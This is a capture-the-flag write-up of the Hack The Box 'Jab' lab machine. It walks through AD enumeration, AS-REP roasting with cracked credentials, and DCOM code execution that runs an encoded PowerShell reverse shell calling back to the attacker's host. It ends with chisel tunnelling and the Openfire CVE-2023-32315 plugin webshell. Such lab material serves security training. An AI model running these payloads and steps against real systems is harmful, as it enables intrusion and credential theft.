HTB | JAB

Machine - https://app.hackthebox.com/machines/Jab

IP - 10.10.11.4

NMAP

└─$ nmap -sC -sV -p 53,88,135,139,389,445,593,5270,5276,7070,7443,49665,49667,49673,49694,49699,49781 10.10.11.4 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-26 19:56 IST
Nmap scan report for 10.10.11.4
Host is up (0.58s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-26 14:26:46Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: jab.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2025-08-26T14:28:25+00:00; +3s from scanner time.
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
5270/tcp  open  ssl/xmpp      Wildfire XMPP Client
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
5276/tcp  open  ssl/jabber    Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     capabilities: 
|     features: 
|     xmpp: 
|     compression_methods: 
|     errors: 
|       (timeout)
|     auth_mechanisms: 
|_    unknown: 
7070/tcp  open  http          Jetty
|_http-title: Openfire HTTP Binding Service
7443/tcp  open  ssl/http      Jetty
|_http-title: Openfire HTTP Binding Service
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
49781/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-08-26T14:28:08
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 3s, deviation: 0s, median: 2s

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 127.36 seconds

Port 53

└─$ dig any @10.10.11.4 jab.htb                     

; <<>> DiG 9.20.8-6-Debian <<>> any @10.10.11.4 jab.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32277
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;jab.htb.                       IN      ANY

;; ANSWER SECTION:
jab.htb.                600     IN      A       10.10.11.4
jab.htb.                3600    IN      NS      dc01.jab.htb.
jab.htb.                3600    IN      SOA     dc01.jab.htb. hostmaster.jab.htb. 8239 900 600 86400 3600

;; ADDITIONAL SECTION:
dc01.jab.htb.           3600    IN      A       10.10.11.4

;; Query time: 423 msec
;; SERVER: 10.10.11.4#53(10.10.11.4) (TCP)
;; WHEN: Tue Aug 26 20:01:25 IST 2025
;; MSG SIZE  rcvd: 134

                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Jab]
└─$ dig axfr @10.10.11.4 jab.htb

; <<>> DiG 9.20.8-6-Debian <<>> axfr @10.10.11.4 jab.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

Port 445

└─$ smbclient -N -L \\\\\\\\10.10.11.4
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.4 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Noting the successful anonymous login, I tried SMB Null session enumeration of usernames via RID cycling, but did not have permissions to make RPC calls.

└─$ netexec smb jab.htb -u "" -p "" --rid-brute
SMB         10.10.11.4      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.4      445    DC01             [+] jab.htb\\: 
SMB         10.10.11.4      445    DC01             [-] Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

Port 88

ldapsearch -H ldap://10.10.11.4 -x -s base namingcontexts 
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=jab,DC=htb
namingcontexts: CN=Configuration,DC=jab,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=jab,DC=htb
namingcontexts: DC=DomainDnsZones,DC=jab,DC=htb
namingcontexts: DC=ForestDnsZones,DC=jab,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

not able to enumerate

ldapsearch -H ldap://10.10.11.4 -x -b "DC=jab,DC=htb"    
# extended LDIF
#
# LDAPv3
# base <DC=jab,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090CE5, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1

I tried to do userenum via Kerbrute but the attack is going for too long (looks like a rabbit hole)

└─$ ./kerbrute userenum --dc 10.10.11.4 -d jab.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 1000 -o kerbrute.txt

We found more than 1800 valid usernames

Let’s try AS-REP Roasting

└─$ grep '@' kerbrute.txt| awk -v FS=' ' '{print $7}' | cut -d '@' -f 1 > as_rep_list_kerbrute.txt

I tried via impacket-GetNPUser, but since it was taking too much time, I moved on

└─$ impacket-GetNPUsers 'jab.htb/' -usersfile as_rep_list_kerbrute.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.11.4

Port 5270

XMPP is the Extensible Messaging and Presence Protocol, a set of open technologies for instant messaging, presence, multi-party chat, voice and video calls, collaboration, lightweight middleware, content syndication, and generalized routing of XML data.

(reference - https://bishopfox.com/blog/xmpp-underappreciated-attack-surface)

Let’s try to connect via Pidgin

I’ll open Pidgin and it says I have no accounts configured:

I’ll click “Add…” and select XMPP from the “Protocol” drop-down, and fill out the rest:

Le’t accept the certificate

Now it prompt for registration, let’s do that

Now we can select our user and the chat panel pops up

From the menu, “Tools” –> “Room List” will give a series of dialogs that leads to a list of the rooms on this server:

conference.jab.htb is automatically filled in. Clicking “Find Rooms” returns two:

I don’t have access to test room

But we can join test2 room, and it has some messages

The image is just text encoded data

┌──(anurag㉿anurag)-[~/htb/Jab]
└─$ echo "VGhlIGltYWdlIGRhdGEgZ29lcyBoZXJlCg==" | base64 -d  
The image data goes here

On looking around we find Search for Users

and it gives us a search directory

On searching, it spat out everything

But there isn’t a way to export the list

asking ChatGPT to find a way to export it suggests opening a debug window and searching again

Now I can save

Let’s copy the list

└─$ grep -oE '[A-Za-z0-9]{1,}\\@jab.htb' purple-debug.log | grep -v 'anurag@jab.htb' | sort -u > jabber_emails.txt

We can extract username

└─$ cat jabber_emails.txt | cut -d '@' -f 1 > jabber_usernames.txt

Fotthold/shell

Shell as svc_openfire

ASREP Roast

Now, with this new list, we can perform ASREP Roast and we found three hash

└─$ impacket-GetNPUsers 'jab.htb/' -usersfile jabber_usernames.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.11.4

└─$ cat hashes.aspreroast       
$krb5asrep$23$jmontgomery@JAB.HTB:745e57fb259d72d045af15f70442bc62$dc298d5fad838ededed90e9f10edf0c43db5ba5cf0393723d55690c0766fc50a6b511b72f617fdcc66e57fb5179fcd6623d373abaef4317957a0e7ece0faef8215aab447c30ccea7919be99d95e27e015352ae35fe20b199b8218fbfdfc4ba694aa9e5b84f40f53246685240846cc1bfab3c0f3070e3d02031591234896a8b56243b910b1d3af1ff2ccb8e70c19812052a330e68d06e99f481d8b842013271374c9edb23019968735a8b40d8776efc917ccf2f6464230fb41dda2c41db06ec94c880bd0c3c603a9616ccac55d57f382fd8477cea913947ce20e1cff943c29c4c0df4
$krb5asrep$23$lbradford@JAB.HTB:6837dd5e228d94a222b8075f2d636615$6783ed990b03d29ec3beeb4b5800b31af97014b7230515b72d69dcce3bf98d250da9566a701a246dbe2a70d04bef55bfe68a7b305050c53e61a882195626d0aedbdc2c4e07936fb1ea9843b6aaab49bd58adad4b510bc57da962d23993058805cead5e4b0447abbc2289213c06e327d9aced24bdb784bf7ce646a347ee874d7212a5b083ae3b58d6dddc96ecb8544a051cfda4e214d47714f543b482d7c478104e8006b511f113fb33ab00b250a174b74fa2342c370e7d5351e7faf2e18872b6fbce43fbfc4d3464efe9a9dad06f59fa39d185f6a9270664fcaa7008d34fd2f4590a
$krb5asrep$23$mlowe@JAB.HTB:6ca2295aadfff0a40efe575c243a6085$0d48e79ff36a9454a2c1565c4c4d584495defaf216f03f83c46f7a6b74e7b6593ad78dffcbaa0011b8c1a67dcd7680b14e970e436102f5329b538d166dbb11ca839cb52c17af86ca04322d8e33bad2cd2b8e84b7eb73e7e28bdd8045a5b8aed62e2d8075ee436c33673009701ab8a68a8c1078b2625d5b7c7c3b9019f451a5a3ebe6834ddf71eb64762fa0c1d04b4fc43adfba5bc365004ffd3d27632f5e188520a1910e12ca851c36be006074c642dee529461461b5e0d13023fda0029934272ac54a78ff59221d4ac5aed71f78b412d85c3804deec8eba3d515d15dd717fed17c8

Let’s crack em

└─$ hashcat hashes.aspreroast /home/anurag/stuff/rockyou.txt 
<--SNIP-->
$krb5asrep$23$jmontgomery@JAB.HTB:745e57fb259d72d045af15f70442bc62$dc298d5fad838ededed90e9f10edf0c43db5ba5cf0393723d55690c0766fc50a6b511b72f617fdcc66e57fb5179fcd6623d373abaef4317957a0e7ece0faef8215aab447c30ccea7919be99d95e27e015352ae35fe20b199b8218fbfdfc4ba694aa9e5b84f40f53246685240846cc1bfab3c0f3070e3d02031591234896a8b56243b910b1d3af1ff2ccb8e70c19812052a330e68d06e99f481d8b842013271374c9edb23019968735a8b40d8776efc917ccf2f6464230fb41dda2c41db06ec94c880bd0c3c603a9616ccac55d57f382fd8477cea913947ce20e1cff943c29c4c0df4:Midnight_121
<--SNIP-->

We found JMontgomery’s cred

We can Auth via LDAP and SMB

└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto 10.10.11.4 -d jab.htb -u jmontgomery -p  'Midnight_121'; echo; done
LDAP        10.10.11.4      389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:jab.htb)
LDAPS       10.10.11.4      636    DC01             [+] jab.htb\\jmontgomery:Midnight_121 

SMB         10.10.11.4      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.4      445    DC01             [+] jab.htb\\jmontgomery:Midnight_121 

WINRM       10.10.11.4      5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:jab.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.4      5985   DC01             [-] jab.htb\\jmontgomery:Midnight_121

└─$ netexec smb jab.htb -u "jmontgomery" -p "Midnight_121" --shares                                                            
SMB         10.10.11.4      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.4      445    DC01             [+] jab.htb\\jmontgomery:Midnight_121 
SMB         10.10.11.4      445    DC01             [*] Enumerated shares
SMB         10.10.11.4      445    DC01             Share           Permissions     Remark
SMB         10.10.11.4      445    DC01             -----           -----------     ------
SMB         10.10.11.4      445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.4      445    DC01             C$                              Default share
SMB         10.10.11.4      445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.4      445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.4      445    DC01             SYSVOL          READ            Logon server share

Since we do not have anything via SMB, let’s see if we can connect to XMPP via jmontgomery cred

Connecting jmontgomery over XMPP

Let’s connect jmontgomery over XMPP

Now we can see a new Room

Let’s connect to that room

From this chat, we now know the credentials of svc_openfire

We can auth via LDAP and SMB

└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto 10.10.11.4 -d jab.htb -u svc_openfire -p  '!@#$%^&*(1qazxsw'; echo; done
LDAP        10.10.11.4      389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:jab.htb)
LDAPS       10.10.11.4      636    DC01             [+] jab.htb\\svc_openfire:!@#$%^&*(1qazxsw 

SMB         10.10.11.4      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.4      445    DC01             [+] jab.htb\\svc_openfire:!@#$%^&*(1qazxsw 

WINRM       10.10.11.4      5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:jab.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.4      5985   DC01             [-] jab.htb\\svc_openfire:!@#$%^&*(1qazxsw

nothing new was there over SMB

└─$ netexec smb jab.htb -u svc_openfire -p  '!@#$%^&*(1qazxsw' --shares
SMB         10.10.11.4      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.4      445    DC01             [+] jab.htb\\svc_openfire:!@#$%^&*(1qazxsw 
SMB         10.10.11.4      445    DC01             [*] Enumerated shares
SMB         10.10.11.4      445    DC01             Share           Permissions     Remark
SMB         10.10.11.4      445    DC01             -----           -----------     ------
SMB         10.10.11.4      445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.4      445    DC01             C$                              Default share
SMB         10.10.11.4      445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.4      445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.4      445    DC01             SYSVOL          READ            Logon server share

Bloodhound

└─$ bloodhound-python -u svc_openfire -p  '!@#$%^&*(1qazxsw' -d jab.htb -ns 10.10.11.4 -c All --zip

On analysing, we found out that SVC_OPENFIRE@JAB.HTB - > ExecuteDCOM - > DC01.JAB.HTB

ExecuteDCOM

The user SVC_OPENFIRE@JAB.HTB has membership in the Distributed COM Users local group on the computer DC01.JAB.HTB.
This can allow code execution under certain conditions by instantiating a COM object on a remote machine and invoking its methods.

DCOM is built on top of the TCP/IP RPC protocol (TCP ports 135 + high ephemeral ports) and may leverage several different RPC interface UUIDs(outlined here). In order to use DCOM, one must be authenticated. Consequently, logon events and authentication-specific logs(Kerberos, NTLM, etc.) will be generated when using DCOM.

reference - https://www.ired.team/offensive-security/lateral-movement/t1175-distributed-component-object-model and https://bloodhound.specterops.io/resources/edges/execute-dcom

Let’s try to ping our machine from the box via DCOM MMC20

└─$ impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'ping 10.10.16.4'  
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

└─$ sudo tcpdump -ni tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
16:37:25.757965 IP 10.10.11.4 > 10.10.16.4: ICMP echo request, id 1, seq 148, length 40
16:37:25.758023 IP 10.10.16.4 > 10.10.11.4: ICMP echo reply, id 1, seq 148, length 40
16:37:27.004052 IP 10.10.11.4 > 10.10.16.4: ICMP echo request, id 1, seq 149, length 40
16:37:27.004075 IP 10.10.16.4 > 10.10.11.4: ICMP echo reply, id 1, seq 149, length 40
16:37:27.692570 IP 10.10.11.4 > 10.10.16.4: ICMP echo request, id 1, seq 150, length 40
16:37:27.692601 IP 10.10.16.4 > 10.10.11.4: ICMP echo reply, id 1, seq 150, length 40
16:37:28.701264 IP 10.10.11.4 > 10.10.16.4: ICMP echo request, id 1, seq 151, length 40
16:37:28.701296 IP 10.10.16.4 > 10.10.11.4: ICMP echo reply, id 1, seq 151, length 40

Now we can try to get revshell

└─$ impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANAAiACwAMQAyADMANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

└─$ nc -nlvp 1234                                                  
listening on [any] 1234 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.4] 64596

PS C:\\windows\\system32> whoami
jab\\svc_openfire
PS C:\\windows\\system32>

found user.txt


    Directory: C:\\Users\\svc_openfire\\Desktop

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---        8/27/2025   5:38 AM             34 user.txt

Privilege Escalation

Shell as Administrator

Port forwarding

we can see port 9090 and 9091 being hosted internally

let’s use chisel to do port forwarding

└─$ ./chisel server -p 8000 --reverse                                                                                                     
2025/08/27 17:10:57 server: Reverse tunnelling enabled
2025/08/27 17:10:57 server: Fingerprint 6qfipdw2+WXV3ZOS8xqEf2y8vPvQ2oJEc/h01ys52WU=
2025/08/27 17:10:57 server: Listening on <http://0.0.0.0:8000>
2025/08/27 17:12:12 server: session#1: Client version (1.10.1) differs from server version (0.0.0-src)
2025/08/27 17:12:12 server: session#1: tun: proxy#R:9090=>9090: Listening
2025/08/27 17:12:12 server: session#1: tun: proxy#R:9091=>9091: Listening

PS C:\\temp> .\\chisel.exe client 10.10.16.4:8000 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091

└─$ nmap -sCV -p9090,9091 localhost      
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-27 17:14 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000096s latency).
Other addresses for localhost (not scanned): ::1

PORT     STATE SERVICE            VERSION
9090/tcp open  hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info: 
|_  Logs: jive-ibtn jive-btn-gradient
| hadoop-tasktracker-info: 
|_  Logs: jive-ibtn jive-btn-gradient
|_http-title: Site doesn't have a title (text/html).
9091/tcp open  ssl/http           Jetty
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 72.21 seconds

Openfire admin console

We can see there is openfire console at port 9091

We can login via svc_openfire

CVE-2023-32315

I found this GitHub Now I need to upload openfire-management-tool-plugin.jar Then goto tab server > server settings > Management tool and Access web shell with password "123"

Here we can see program home page

Now we have to select system command

and we can execute cmd

and we are nt authority\\system

we get root.txt

we can also get revshell

└─$ nc -nlvp 9001                  
listening on [any] 9001 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.4] 65362

PS C:\\Program Files\\Openfire\\bin> whoami
nt authority\\system
PS C:\\Program Files\\Openfire\\bin>

PreviousHTB | Job NextFlight | HTB

Last updated 1 month ago